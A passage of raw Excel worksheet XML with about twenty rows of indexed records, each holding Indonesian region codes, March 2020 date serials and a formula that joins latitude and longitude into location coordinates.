      <c r="E1972" t="s">
        <v>23</v>
      </c>
      <c r="G1972" t="s">
        <v>6596</v>
      </c>
      <c r="H1972" t="s">
        <v>26</v>
      </c>
      <c r="J1972" t="s">
        <v>4994</v>
      </c>
      <c r="L1972" t="s">
        <v>6597</v>
      </c>
      <c r="M1972">
        <v>3171080003</v>
      </c>
      <c r="N1972">
        <v>3171080</v>
      </c>
      <c r="O1972">
        <v>3171</v>
      </c>
      <c r="P1972">
        <v>31</v>
      </c>
      <c r="Q1972" t="s">
        <v>3677</v>
      </c>
      <c r="R1972" t="s">
        <v>1403</v>
      </c>
      <c r="S1972" t="s">
        <v>108</v>
      </c>
      <c r="T1972" t="s">
        <v>33</v>
      </c>
      <c r="U1972" s="5">
        <v>10682808</v>
      </c>
      <c r="V1972" s="5" t="s">
        <v>16207</v>
      </c>
      <c r="W1972" s="5">
        <v>-625428</v>
      </c>
      <c r="X1972" t="s">
        <v>19961</v>
      </c>
      <c r="Y1972" t="str">
        <f t="shared" si="30"/>
        <v>-6.25428,106.82808</v>
      </c>
    </row>
    <row r="1973" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1973">
        <v>174291</v>
      </c>
      <c r="B1973" s="1">
        <v>43906</v>
      </c>
      <c r="C1973" t="s">
        <v>6481</v>
      </c>
      <c r="D1973" t="s">
        <v>22</v>
      </c>
      <c r="E1973" t="s">
        <v>23</v>
      </c>
      <c r="F1973" t="s">
        <v>6598</v>
      </c>
      <c r="G1973" t="s">
        <v>6599</v>
      </c>
      <c r="H1973" t="s">
        <v>26</v>
      </c>
      <c r="I1973" t="s">
        <v>511</v>
      </c>
      <c r="J1973" t="s">
        <v>4020</v>
      </c>
      <c r="L1973" t="s">
        <v>6600</v>
      </c>
      <c r="M1973">
        <v>3172050004</v>
      </c>
      <c r="N1973">
        <v>3172050</v>
      </c>
      <c r="O1973">
        <v>3172</v>
      </c>
      <c r="P1973">
        <v>31</v>
      </c>
      <c r="Q1973" t="s">
        <v>2717</v>
      </c>
      <c r="R1973" t="s">
        <v>358</v>
      </c>
      <c r="S1973" t="s">
        <v>49</v>
      </c>
      <c r="T1973" t="s">
        <v>33</v>
      </c>
      <c r="U1973" s="5">
        <v>10687678</v>
      </c>
      <c r="V1973" s="5" t="s">
        <v>16208</v>
      </c>
      <c r="W1973" s="5">
        <v>-629508</v>
      </c>
      <c r="X1973" t="s">
        <v>19962</v>
      </c>
      <c r="Y1973" t="str">
        <f t="shared" si="30"/>
        <v>-6.29508,106.87678</v>
      </c>
    </row>
    <row r="1974" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1974">
        <v>174325</v>
      </c>
      <c r="B1974" s="1">
        <v>43906</v>
      </c>
      <c r="C1974" t="s">
        <v>6481</v>
      </c>
      <c r="D1974" t="s">
        <v>22</v>
      </c>
      <c r="E1974" t="s">
        <v>23</v>
      </c>
      <c r="F1974" t="s">
        <v>6601</v>
      </c>
      <c r="H1974" t="s">
        <v>26</v>
      </c>
      <c r="I1974" t="s">
        <v>166</v>
      </c>
      <c r="J1974" t="s">
        <v>6602</v>
      </c>
      <c r="L1974" t="s">
        <v>6603</v>
      </c>
      <c r="M1974">
        <v>3172040004</v>
      </c>
      <c r="N1974">
        <v>3172040</v>
      </c>
      <c r="O1974">
        <v>3172</v>
      </c>
      <c r="P1974">
        <v>31</v>
      </c>
      <c r="Q1974" t="s">
        <v>280</v>
      </c>
      <c r="R1974" t="s">
        <v>281</v>
      </c>
      <c r="S1974" t="s">
        <v>49</v>
      </c>
      <c r="T1974" t="s">
        <v>33</v>
      </c>
      <c r="U1974" s="5">
        <v>10688027</v>
      </c>
      <c r="V1974" s="5" t="s">
        <v>15115</v>
      </c>
      <c r="W1974" s="5">
        <v>-626186</v>
      </c>
      <c r="X1974" t="s">
        <v>19963</v>
      </c>
      <c r="Y1974" t="str">
        <f t="shared" si="30"/>
        <v>-6.26186,106.88027</v>
      </c>
    </row>
    <row r="1975" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1975">
        <v>174338</v>
      </c>
      <c r="B1975" s="1">
        <v>43906</v>
      </c>
      <c r="C1975" t="s">
        <v>6481</v>
      </c>
      <c r="D1975" t="s">
        <v>2648</v>
      </c>
      <c r="E1975" t="s">
        <v>23</v>
      </c>
      <c r="G1975" t="s">
        <v>6604</v>
      </c>
      <c r="H1975" t="s">
        <v>26</v>
      </c>
      <c r="J1975" t="s">
        <v>6605</v>
      </c>
      <c r="L1975" t="s">
        <v>6606</v>
      </c>
      <c r="M1975">
        <v>3171010002</v>
      </c>
      <c r="N1975">
        <v>3171010</v>
      </c>
      <c r="O1975">
        <v>3171</v>
      </c>
      <c r="P1975">
        <v>31</v>
      </c>
      <c r="Q1975" t="s">
        <v>6607</v>
      </c>
      <c r="R1975" t="s">
        <v>264</v>
      </c>
      <c r="S1975" t="s">
        <v>108</v>
      </c>
      <c r="T1975" t="s">
        <v>33</v>
      </c>
      <c r="U1975" s="5">
        <v>10682635</v>
      </c>
      <c r="V1975" s="5" t="s">
        <v>16209</v>
      </c>
      <c r="W1975" s="5">
        <v>-633732</v>
      </c>
      <c r="X1975" t="s">
        <v>19964</v>
      </c>
      <c r="Y1975" t="str">
        <f t="shared" si="30"/>
        <v>-6.33732,106.82635</v>
      </c>
    </row>
    <row r="1976" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1976">
        <v>174342</v>
      </c>
      <c r="B1976" s="1">
        <v>43906</v>
      </c>
      <c r="C1976" t="s">
        <v>6481</v>
      </c>
      <c r="D1976" t="s">
        <v>2648</v>
      </c>
      <c r="E1976" t="s">
        <v>23</v>
      </c>
      <c r="G1976" t="s">
        <v>6608</v>
      </c>
      <c r="H1976" t="s">
        <v>26</v>
      </c>
      <c r="J1976" t="s">
        <v>6605</v>
      </c>
      <c r="L1976" t="s">
        <v>6609</v>
      </c>
      <c r="M1976">
        <v>3171010002</v>
      </c>
      <c r="N1976">
        <v>3171010</v>
      </c>
      <c r="O1976">
        <v>3171</v>
      </c>
      <c r="P1976">
        <v>31</v>
      </c>
      <c r="Q1976" t="s">
        <v>6607</v>
      </c>
      <c r="R1976" t="s">
        <v>264</v>
      </c>
      <c r="S1976" t="s">
        <v>108</v>
      </c>
      <c r="T1976" t="s">
        <v>33</v>
      </c>
      <c r="U1976" s="5">
        <v>10682637</v>
      </c>
      <c r="V1976" s="5" t="s">
        <v>16210</v>
      </c>
      <c r="W1976" s="5">
        <v>-633732</v>
      </c>
      <c r="X1976" t="s">
        <v>19964</v>
      </c>
      <c r="Y1976" t="str">
        <f t="shared" si="30"/>
        <v>-6.33732,106.82637</v>
      </c>
    </row>
    <row r="1977" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1977">
        <v>174398</v>
      </c>
      <c r="B1977" s="1">
        <v>43906</v>
      </c>
      <c r="C1977" t="s">
        <v>6454</v>
      </c>
      <c r="D1977" t="s">
        <v>2648</v>
      </c>
      <c r="E1977" t="s">
        <v>23</v>
      </c>
      <c r="G1977" t="s">
        <v>6610</v>
      </c>
      <c r="H1977" t="s">
        <v>26</v>
      </c>
      <c r="J1977" t="s">
        <v>2580</v>
      </c>
      <c r="L1977" t="s">
        <v>6611</v>
      </c>
      <c r="M1977">
        <v>3172040005</v>
      </c>
      <c r="N1977">
        <v>3172040</v>
      </c>
      <c r="O1977">
        <v>3172</v>
      </c>
      <c r="P1977">
        <v>31</v>
      </c>
      <c r="Q1977" t="s">
        <v>1351</v>
      </c>
      <c r="R1977" t="s">
        <v>281</v>
      </c>
      <c r="S1977" t="s">
        <v>49</v>
      </c>
      <c r="T1977" t="s">
        <v>33</v>
      </c>
      <c r="U1977" s="5">
        <v>10689397</v>
      </c>
      <c r="V1977" s="5" t="s">
        <v>16211</v>
      </c>
      <c r="W1977" s="5">
        <v>-624109</v>
      </c>
      <c r="X1977" t="s">
        <v>19965</v>
      </c>
      <c r="Y1977" t="str">
        <f t="shared" si="30"/>
        <v>-6.24109,106.89397</v>
      </c>
    </row>
    <row r="1978" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1978">
        <v>174435</v>
      </c>
      <c r="B1978" s="1">
        <v>43906</v>
      </c>
      <c r="C1978" t="s">
        <v>6454</v>
      </c>
      <c r="D1978" t="s">
        <v>22</v>
      </c>
      <c r="E1978" t="s">
        <v>23</v>
      </c>
      <c r="F1978" t="s">
        <v>6612</v>
      </c>
      <c r="G1978" t="s">
        <v>6613</v>
      </c>
      <c r="H1978" t="s">
        <v>26</v>
      </c>
      <c r="I1978" t="s">
        <v>137</v>
      </c>
      <c r="J1978" t="s">
        <v>3066</v>
      </c>
      <c r="L1978" t="s">
        <v>6614</v>
      </c>
      <c r="M1978">
        <v>3173020001</v>
      </c>
      <c r="N1978">
        <v>3173020</v>
      </c>
      <c r="O1978">
        <v>3173</v>
      </c>
      <c r="P1978">
        <v>31</v>
      </c>
      <c r="Q1978" t="s">
        <v>179</v>
      </c>
      <c r="R1978" t="s">
        <v>179</v>
      </c>
      <c r="S1978" t="s">
        <v>62</v>
      </c>
      <c r="T1978" t="s">
        <v>33</v>
      </c>
      <c r="U1978" s="5">
        <v>10683380</v>
      </c>
      <c r="V1978" s="5" t="s">
        <v>15158</v>
      </c>
      <c r="W1978" s="5">
        <v>-619926</v>
      </c>
      <c r="X1978" t="s">
        <v>18957</v>
      </c>
      <c r="Y1978" t="str">
        <f t="shared" si="30"/>
        <v>-6.19926,106.83380</v>
      </c>
    </row>
    <row r="1979" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1979">
        <v>174486</v>
      </c>
      <c r="B1979" s="1">
        <v>43906</v>
      </c>
      <c r="C1979" t="s">
        <v>6454</v>
      </c>
      <c r="D1979" t="s">
        <v>2648</v>
      </c>
      <c r="E1979" t="s">
        <v>23</v>
      </c>
      <c r="G1979" t="s">
        <v>6615</v>
      </c>
      <c r="H1979" t="s">
        <v>26</v>
      </c>
      <c r="J1979" t="s">
        <v>2916</v>
      </c>
      <c r="L1979" t="s">
        <v>6616</v>
      </c>
      <c r="M1979">
        <v>3172040003</v>
      </c>
      <c r="N1979">
        <v>3172040</v>
      </c>
      <c r="O1979">
        <v>3172</v>
      </c>
      <c r="P1979">
        <v>31</v>
      </c>
      <c r="Q1979" t="s">
        <v>552</v>
      </c>
      <c r="R1979" t="s">
        <v>281</v>
      </c>
      <c r="S1979" t="s">
        <v>49</v>
      </c>
      <c r="T1979" t="s">
        <v>33</v>
      </c>
      <c r="U1979" s="5">
        <v>10688187</v>
      </c>
      <c r="V1979" s="5" t="s">
        <v>16212</v>
      </c>
      <c r="W1979" s="5">
        <v>-626257</v>
      </c>
      <c r="X1979" t="s">
        <v>19966</v>
      </c>
      <c r="Y1979" t="str">
        <f t="shared" si="30"/>
        <v>-6.26257,106.88187</v>
      </c>
    </row>
    <row r="1980" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1980">
        <v>174516</v>
      </c>
      <c r="B1980" s="1">
        <v>43906</v>
      </c>
      <c r="C1980" t="s">
        <v>6617</v>
      </c>
      <c r="D1980" t="s">
        <v>22</v>
      </c>
      <c r="E1980" t="s">
        <v>23</v>
      </c>
      <c r="F1980" t="s">
        <v>6618</v>
      </c>
      <c r="G1980" t="s">
        <v>6619</v>
      </c>
      <c r="H1980" t="s">
        <v>26</v>
      </c>
      <c r="I1980" t="s">
        <v>517</v>
      </c>
      <c r="J1980" t="s">
        <v>2627</v>
      </c>
      <c r="L1980" t="s">
        <v>6620</v>
      </c>
      <c r="M1980">
        <v>3201190010</v>
      </c>
      <c r="N1980">
        <v>3201190</v>
      </c>
      <c r="O1980">
        <v>3201</v>
      </c>
      <c r="P1980">
        <v>32</v>
      </c>
      <c r="Q1980" t="s">
        <v>419</v>
      </c>
      <c r="R1980" t="s">
        <v>420</v>
      </c>
      <c r="S1980" t="s">
        <v>421</v>
      </c>
      <c r="T1980" t="s">
        <v>42</v>
      </c>
      <c r="U1980" s="5">
        <v>10696818</v>
      </c>
      <c r="V1980" s="5" t="s">
        <v>16213</v>
      </c>
      <c r="W1980" s="5">
        <v>-630634</v>
      </c>
      <c r="X1980" t="s">
        <v>19967</v>
      </c>
      <c r="Y1980" t="str">
        <f t="shared" si="30"/>
        <v>-6.30634,106.96818</v>
      </c>
    </row>
    <row r="1981" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1981">
        <v>174529</v>
      </c>
      <c r="B1981" s="1">
        <v>43906</v>
      </c>
      <c r="C1981" t="s">
        <v>6617</v>
      </c>
      <c r="D1981" t="s">
        <v>22</v>
      </c>
      <c r="E1981" t="s">
        <v>23</v>
      </c>
      <c r="F1981" t="s">
        <v>6621</v>
      </c>
      <c r="G1981" t="s">
        <v>6622</v>
      </c>
      <c r="H1981" t="s">
        <v>26</v>
      </c>
      <c r="I1981" t="s">
        <v>1991</v>
      </c>
      <c r="J1981" t="s">
        <v>278</v>
      </c>
      <c r="L1981" t="s">
        <v>6623</v>
      </c>
      <c r="M1981">
        <v>3172040004</v>
      </c>
      <c r="N1981">
        <v>3172040</v>
      </c>
      <c r="O1981">
        <v>3172</v>
      </c>
      <c r="P1981">
        <v>31</v>
      </c>
      <c r="Q1981" t="s">
        <v>280</v>
      </c>
      <c r="R1981" t="s">
        <v>281</v>
      </c>
      <c r="S1981" t="s">
        <v>49</v>
      </c>
      <c r="T1981" t="s">
        <v>33</v>
      </c>
      <c r="U1981" s="5">
        <v>10687890</v>
      </c>
      <c r="V1981" s="5" t="s">
        <v>16214</v>
      </c>
      <c r="W1981" s="5">
        <v>-626922</v>
      </c>
      <c r="X1981" t="s">
        <v>19968</v>
      </c>
      <c r="Y1981" t="str">
        <f t="shared" si="30"/>
        <v>-6.26922,106.87890</v>
      </c>
    </row>
    <row r="1982" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1982">
        <v>175074</v>
      </c>
      <c r="B1982" s="1">
        <v>43907</v>
      </c>
      <c r="C1982" t="s">
        <v>6442</v>
      </c>
      <c r="D1982" t="s">
        <v>22</v>
      </c>
      <c r="E1982" t="s">
        <v>23</v>
      </c>
      <c r="F1982" t="s">
        <v>6624</v>
      </c>
      <c r="H1982" t="s">
        <v>26</v>
      </c>
      <c r="I1982" t="s">
        <v>6625</v>
      </c>
      <c r="J1982" t="s">
        <v>6626</v>
      </c>
      <c r="L1982" t="s">
        <v>250</v>
      </c>
      <c r="M1982">
        <v>7371110005</v>
      </c>
      <c r="N1982">
        <v>7371110</v>
      </c>
      <c r="O1982">
        <v>7371</v>
      </c>
      <c r="P1982">
        <v>73</v>
      </c>
      <c r="Q1982" t="s">
        <v>6627</v>
      </c>
      <c r="R1982" t="s">
        <v>6628</v>
      </c>
      <c r="S1982" t="s">
        <v>6629</v>
      </c>
      <c r="T1982" t="s">
        <v>6630</v>
      </c>
      <c r="U1982" s="5">
        <v>11951044</v>
      </c>
      <c r="V1982" s="5" t="s">
        <v>16215</v>
      </c>
      <c r="W1982" s="5">
        <v>-511411</v>
      </c>
      <c r="X1982" t="s">
        <v>19969</v>
      </c>
      <c r="Y1982" t="str">
        <f t="shared" si="30"/>
        <v>-5.11411,119.51044</v>
      </c>
    </row>
    <row r="1983" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1983">
        <v>175202</v>
      </c>
      <c r="B1983" s="1">
        <v>43907</v>
      </c>
      <c r="C1983" t="s">
        <v>6514</v>
      </c>
      <c r="D1983" t="s">
        <v>2648</v>
      </c>
      <c r="E1983" t="s">
        <v>23</v>
      </c>
      <c r="G1983" t="s">
        <v>6631</v>
      </c>
      <c r="H1983" t="s">
        <v>26</v>
      </c>
      <c r="J1983" t="s">
        <v>6632</v>
      </c>
      <c r="L1983" t="s">
        <v>6633</v>
      </c>
      <c r="M1983">
        <v>3171090003</v>
      </c>
      <c r="N1983">
        <v>3171090</v>
      </c>
      <c r="O1983">
        <v>3171</v>
      </c>
      <c r="P1983">
        <v>31</v>
      </c>
      <c r="Q1983" t="s">
        <v>3154</v>
      </c>
      <c r="R1983" t="s">
        <v>347</v>
      </c>
      <c r="S1983" t="s">
        <v>108</v>
      </c>
      <c r="T1983" t="s">
        <v>33</v>
      </c>
      <c r="U1983" s="5">
        <v>10685327</v>
      </c>
      <c r="V1983" s="5" t="s">
        <v>16216</v>
      </c>
      <c r="W1983" s="5">
        <v>-623384</v>
      </c>
      <c r="X1983" t="s">
        <v>19970</v>
      </c>
      <c r="Y1983" t="str">
        <f t="shared" si="30"/>
        <v>-6.23384,106.85327</v>
      </c>
    </row>
    <row r="1984" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1984">
        <v>175617</v>
      </c>
      <c r="B1984" s="1">
        <v>43907</v>
      </c>
      <c r="C1984" t="s">
        <v>6454</v>
      </c>
      <c r="D1984" t="s">
        <v>22</v>
      </c>
      <c r="E1984" t="s">
        <v>23</v>
      </c>
      <c r="F1984" t="s">
        <v>6634</v>
      </c>
      <c r="H1984" t="s">
        <v>26</v>
      </c>
      <c r="I1984" t="s">
        <v>271</v>
      </c>
      <c r="J1984" t="s">
        <v>2622</v>
      </c>
      <c r="L1984" t="s">
        <v>6635</v>
      </c>
      <c r="M1984">
        <v>3578280006</v>
      </c>
      <c r="N1984">
        <v>3578280</v>
      </c>
      <c r="O1984">
        <v>3578</v>
      </c>
      <c r="P1984">
        <v>35</v>
      </c>
      <c r="Q1984" t="s">
        <v>6388</v>
      </c>
      <c r="R1984" t="s">
        <v>6389</v>
      </c>
      <c r="S1984" t="s">
        <v>1346</v>
      </c>
      <c r="T1984" t="s">
        <v>1221</v>
      </c>
      <c r="U1984" s="5">
        <v>11265944</v>
      </c>
      <c r="V1984" s="5" t="s">
        <v>16217</v>
      </c>
      <c r="W1984" s="5">
        <v>-725675</v>
      </c>
      <c r="X1984" t="s">
        <v>19971</v>
      </c>
      <c r="Y1984" t="str">
        <f t="shared" si="30"/>
        <v>-7.25675,112.65944</v>
      </c>
    </row>
    <row r="1985" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1985">
        <v>175927</v>
      </c>
      <c r="B1985" s="1">
        <v>43907</v>
      </c>
      <c r="C1985" t="s">
        <v>6535</v>
      </c>
      <c r="D1985" t="s">
        <v>22</v>
      </c>
      <c r="E1985" t="s">
        <v>23</v>
      </c>
      <c r="F1985" t="s">
        <v>6636</v>
      </c>
      <c r="G1985" t="s">
        <v>6637</v>
      </c>
      <c r="H1985" t="s">
        <v>26</v>
      </c>
      <c r="I1985" t="s">
        <v>2165</v>
      </c>
      <c r="J1985" t="s">
        <v>2627</v>
      </c>
      <c r="M1985">
        <v>3275010008</v>
      </c>
      <c r="N1985">
        <v>3275010</v>
      </c>
      <c r="O1985">
        <v>3275</v>
      </c>
      <c r="P1985">
        <v>32</v>
      </c>
      <c r="Q1985" t="s">
        <v>2236</v>
      </c>
      <c r="R1985" t="s">
        <v>287</v>
      </c>
      <c r="S1985" t="s">
        <v>41</v>
      </c>
      <c r="T1985" t="s">
        <v>42</v>
      </c>
      <c r="U1985" s="5">
        <v>10692109</v>
      </c>
      <c r="V1985" s="5" t="s">
        <v>16218</v>
      </c>
      <c r="W1985" s="5">
        <v>-628015</v>
      </c>
      <c r="X1985" t="s">
        <v>19972</v>
      </c>
      <c r="Y1985" t="str">
        <f t="shared" si="30"/>
        <v>-6.28015,106.92109</v>
      </c>
    </row>
    <row r="1986" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1986">
        <v>175964</v>
      </c>
      <c r="B1986" s="1">
        <v>43907</v>
      </c>
      <c r="C1986" t="s">
        <v>6535</v>
      </c>
      <c r="D1986" t="s">
        <v>22</v>
      </c>
      <c r="E1986" t="s">
        <v>23</v>
      </c>
      <c r="F1986" t="s">
        <v>6638</v>
      </c>
      <c r="G1986" t="s">
        <v>6639</v>
      </c>
      <c r="H1986" t="s">
        <v>26</v>
      </c>
      <c r="I1986" t="s">
        <v>72</v>
      </c>
      <c r="J1986" t="s">
        <v>2627</v>
      </c>
      <c r="L1986" t="s">
        <v>6640</v>
      </c>
      <c r="M1986">
        <v>3276011002</v>
      </c>
      <c r="N1986">
        <v>3276011</v>
      </c>
      <c r="O1986">
        <v>3276</v>
      </c>
      <c r="P1986">
        <v>32</v>
      </c>
      <c r="Q1986" t="s">
        <v>6641</v>
      </c>
      <c r="R1986" t="s">
        <v>6642</v>
      </c>
      <c r="S1986" t="s">
        <v>185</v>
      </c>
      <c r="T1986" t="s">
        <v>42</v>
      </c>
      <c r="U1986" s="5">
        <v>10673642</v>
      </c>
      <c r="V1986" s="5" t="s">
        <v>16219</v>
      </c>
      <c r="W1986" s="5">
        <v>-642497</v>
      </c>
      <c r="X1986" t="s">
        <v>19973</v>
      </c>
      <c r="Y1986" t="str">
        <f t="shared" si="30"/>
        <v>-6.42497,106.73642</v>
      </c>
    </row>
    <row r="1987" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1987">
        <v>176016</v>
      </c>
      <c r="B1987" s="1">
        <v>43908</v>
      </c>
      <c r="C1987" t="s">
        <v>6442</v>
      </c>
      <c r="D1987" t="s">
        <v>85</v>
      </c>
      <c r="E1987" t="s">
        <v>23</v>
      </c>
      <c r="F1987" t="s">
        <v>6643</v>
      </c>
      <c r="G1987" t="s">
        <v>6644</v>
      </c>
      <c r="H1987" t="s">
        <v>26</v>
      </c>
      <c r="J1987" t="s">
        <v>2627</v>
      </c>
      <c r="K1987" t="s">
        <v>6645</v>
      </c>
      <c r="L1987" t="s">
        <v>6646</v>
      </c>
      <c r="M1987">
        <v>3275010010</v>
      </c>
      <c r="N1987">
        <v>3275010</v>
      </c>
      <c r="O1987">
        <v>3275</v>
      </c>
      <c r="P1987">
        <v>32</v>
      </c>
      <c r="Q1987" t="s">
        <v>286</v>
      </c>
      <c r="R1987" t="s">
        <v>287</v>
      </c>
      <c r="S1987" t="s">
        <v>41</v>
      </c>
      <c r="T1987" t="s">
        <v>42</v>
      </c>
      <c r="U1987" s="5">
        <v>10694407</v>
      </c>
      <c r="V1987" s="5" t="s">
        <v>16220</v>
      </c>
      <c r="W1987" s="5">
        <v>-625426</v>
      </c>
      <c r="X1987" t="s">
        <v>19974</v>
      </c>
      <c r="Y1987" t="str">
        <f t="shared" ref="Y1987:Y2050" si="31">CONCATENATE(X1987,",",V1987)</f>
        <v>-6.25426,106.94407</v>
      </c>
    </row>
    <row r="1988" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1988">
        <v>176050</v>
      </c>
      <c r="B1988" s="1">
        <v>43908</v>
      </c>
      <c r="C1988" t="s">
        <v>6514</v>
      </c>
      <c r="D1988" t="s">
        <v>2648</v>
      </c>
      <c r="E1988" t="s">
        <v>23</v>
      </c>
      <c r="G1988" t="s">
        <v>6647</v>
      </c>
      <c r="H1988" t="s">
        <v>26</v>
      </c>
      <c r="J1988" t="s">
        <v>6648</v>
      </c>
      <c r="L1988" t="s">
        <v>2766</v>
      </c>
      <c r="M1988">
        <v>3174070004</v>
      </c>
      <c r="N1988">
        <v>3174070</v>
      </c>
      <c r="O1988">
        <v>3174</v>
      </c>
      <c r="P1988">
        <v>31</v>
      </c>
      <c r="Q1988" t="s">
        <v>926</v>
      </c>
      <c r="R1988" t="s">
        <v>84</v>
      </c>
      <c r="S1988" t="s">
        <v>32</v>
      </c>
      <c r="T1988" t="s">
        <v>33</v>
      </c>
      <c r="U1988" s="5">
        <v>10674733</v>
      </c>
      <c r="V1988" s="5" t="s">
        <v>16221</v>
      </c>
      <c r="W1988" s="5">
        <v>-613576</v>
      </c>
      <c r="X1988" t="s">
        <v>19975</v>
      </c>
      <c r="Y1988" t="str">
        <f t="shared" si="31"/>
        <v>-6.13576,106.74733</v>
      </c>
    </row>
    <row r="1989" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1989">
        <v>176051</v>
      </c>
      <c r="B1989" s="1">
        <v>43908</v>
      </c>
      <c r="C1989" t="s">
        <v>6476</v>
      </c>
      <c r="D1989" t="s">
        <v>22</v>
      </c>
      <c r="E1989" t="s">
        <v>23</v>
      </c>
      <c r="F1989" t="s">
        <v>6649</v>
      </c>
      <c r="H1989" t="s">
        <v>26</v>
      </c>
      <c r="I1989" t="s">
        <v>1263</v>
      </c>
      <c r="J1989" t="s">
        <v>6650</v>
      </c>
      <c r="L1989" t="s">
        <v>3935</v>
      </c>
      <c r="M1989">
        <v>3173020004</v>
      </c>
      <c r="N1989">
        <v>3173020</v>
      </c>
      <c r="O1989">
        <v>3173</v>
      </c>
      <c r="P1989">
        <v>31</v>
      </c>
      <c r="Q1989" t="s">
        <v>6651</v>
      </c>
      <c r="R1989" t="s">
        <v>179</v>
      </c>
      <c r="S1989" t="s">
        <v>62</v>
      </c>
      <c r="T1989" t="s">
        <v>33</v>
      </c>
      <c r="U1989" s="5">
        <v>10682614</v>
      </c>
      <c r="V1989" s="5" t="s">
        <v>16222</v>
      </c>
      <c r="W1989" s="5">
        <v>-619446</v>
      </c>
      <c r="X1989" t="s">
        <v>19976</v>
      </c>
      <c r="Y1989" t="str">
        <f t="shared" si="31"/>
        <v>-6.19446,106.82614</v>
      </c>
    </row>
    <row r="1990" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1990">
        <v>176052</v>
      </c>
      <c r="B1990" s="1">
        <v>43909</v>
      </c>
      <c r="C1990" t="s">
        <v>6454</v>
      </c>
      <c r="D1990" t="s">
        <v>22</v>
      </c>
      <c r="E1990" t="s">
        <v>23</v>
      </c>
      <c r="F1990" t="s">
        <v>6652</v>
      </c>
      <c r="G1990" t="s">
        <v>6653</v>
      </c>
      <c r="H1990" t="s">
        <v>26</v>
      </c>
      <c r="I1990" t="s">
        <v>1683</v>
      </c>
      <c r="J1990" t="s">
        <v>2627</v>
      </c>
      <c r="L1990" t="s">
        <v>6654</v>
      </c>
      <c r="M1990">
        <v>3216061004</v>
      </c>
      <c r="N1990">
        <v>3216061</v>
      </c>
      <c r="O1990">
        <v>3216</v>
      </c>
      <c r="P1990">
        <v>32</v>
      </c>
      <c r="Q1990" t="s">
        <v>54</v>
      </c>
      <c r="R1990" t="s">
        <v>55</v>
      </c>
      <c r="S1990" t="s">
        <v>41</v>
      </c>
      <c r="T1990" t="s">
        <v>42</v>
      </c>
      <c r="U1990" s="5">
        <v>10716477</v>
      </c>
      <c r="V1990" s="5" t="s">
        <v>16223</v>
      </c>
      <c r="W1990" s="5">
        <v>-629957</v>
      </c>
      <c r="X1990" t="s">
        <v>19977</v>
      </c>
      <c r="Y1990" t="str">
        <f t="shared" si="31"/>
        <v>-6.29957,107.16477</v>
      </c>
    </row>
    <row r="1991" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1991">
        <v>176053</v>
      </c>
      <c r="B1991" s="1">
        <v>43910</v>
      </c>
      <c r="C1991" t="s">
        <v>6442</v>
      </c>
      <c r="D1991" t="s">
        <v>2648</v>
      </c>
      <c r="E1991" t="s">
        <v>23</v>
      </c>
      <c r="G1991" t="s">
        <v>6655</v>
      </c>
      <c r="H1991" t="s">
        <v>26</v>
      </c>
      <c r="J1991" t="s">
        <v>6537</v>
      </c>
      <c r="L1991" t="s">
        <v>6656</v>
      </c>
      <c r="M1991">
        <v>3172080005</v>
      </c>
      <c r="N1991">
        <v>3172080</v>
      </c>
      <c r="O1991">
        <v>3172</v>
      </c>
      <c r="P1991">
        <v>31</v>
      </c>
      <c r="Q1991" t="s">
        <v>140</v>
      </c>
      <c r="R1991" t="s">
        <v>141</v>
      </c>
      <c r="S1991" t="s">
        <v>49</v>
      </c>
      <c r="T1991" t="s">
        <v>33</v>
      </c>
      <c r="U1991" s="5">
        <v>10694817</v>
      </c>
      <c r="V1991" s="5" t="s">
        <v>16192</v>
      </c>
      <c r="W1991" s="5">
        <v>-617315</v>
      </c>
      <c r="X1991" t="s">
        <v>19978</v>
      </c>
      <c r="Y1991" t="str">
        <f t="shared" si="31"/>
        <v>-6.17315,106.94817</v>
      </c>
    </row>
    <row r="1992" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1992">
        <v>176088</v>
      </c>
      <c r="B1992" s="1">
        <v>43910</v>
      </c>
      <c r="C1992" t="s">
        <v>6527</v>
      </c>
      <c r="D1992" t="s">
        <v>2648</v>
      </c>
      <c r="E1992" t="s">
        <v>23</v>
      </c>
      <c r="G1992" t="s">
        <v>6657</v>
      </c>
      <c r="H1992" t="s">
        <v>26</v>
      </c>
      <c r="J1992" t="s">
        <v>6658</v>
      </c>
      <c r="L1992" t="s">
        <v>6659</v>
      </c>
      <c r="M1992">
        <v>3171030004</v>
      </c>
      <c r="N1992">
        <v>3171030</v>
      </c>
      <c r="O1992">
        <v>3171</v>
      </c>
      <c r="P1992">
        <v>31</v>
      </c>
      <c r="Q1992" t="s">
        <v>6660</v>
      </c>
      <c r="R1992" t="s">
        <v>364</v>
      </c>
      <c r="S1992" t="s">
        <v>108</v>
      </c>
      <c r="T1992" t="s">
        <v>33</v>
      </c>
      <c r="U1992" s="5">
        <v>10679715</v>
      </c>
      <c r="V1992" s="5" t="s">
        <v>16224</v>
      </c>
      <c r="W1992" s="5">
        <v>-626391</v>
      </c>
      <c r="X1992" t="s">
        <v>19979</v>
      </c>
      <c r="Y1992" t="str">
        <f t="shared" si="31"/>
        <v>-6.26391,106.79715</v>
      </c>
    </row>
    <row r="1993" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1993">
        <v>176107</v>
      </c>
      <c r="B1993" s="1">
        <v>43910</v>
      </c>
      <c r="C1993" t="s">
        <v>6527</v>
      </c>
      <c r="D1993" t="s">
        <v>22</v>
      </c>
      <c r="E1993" t="s">
        <v>23</v>
      </c>
      <c r="F1993" t="s">
        <v>6661</v>
      </c>
      <c r="G1993" t="s">
        <v>6662</v>
      </c>
      <c r="H1993" t="s">
        <v>26</v>
      </c>
